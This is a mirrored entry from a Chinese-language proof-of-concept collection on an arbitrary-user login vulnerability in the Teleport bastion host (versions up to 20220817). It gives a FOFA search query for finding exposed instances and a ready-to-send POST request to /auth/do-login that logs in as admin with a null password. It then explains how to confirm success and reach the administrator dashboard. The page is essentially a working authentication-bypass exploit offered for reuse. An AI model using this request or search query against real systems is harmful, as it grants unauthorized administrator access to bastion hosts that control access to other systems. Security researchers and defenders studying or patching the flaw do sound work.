admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md
Threekiii 787d4d4465 更新漏洞库:网络设备漏洞/
2022-08-24 14:34:12 +08:00

899 B
Raw Blame History

Teleport堡垒机 do-login 任意用户登录漏洞

漏洞描述

Teleport堡垒机存在任意用户登录漏洞攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限

漏洞影响

Teleport Version <= 20220817

FOFA

app="TELEPORT堡垒机"

漏洞复现

登录页面

image-20220824134958109

验证POC captcha参数为验证码

POST /auth/do-login

args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}

image-20220824135439227

code 返回 0 即为成功,再访问 /dashboard 获取管理员权限

image-20220824135449199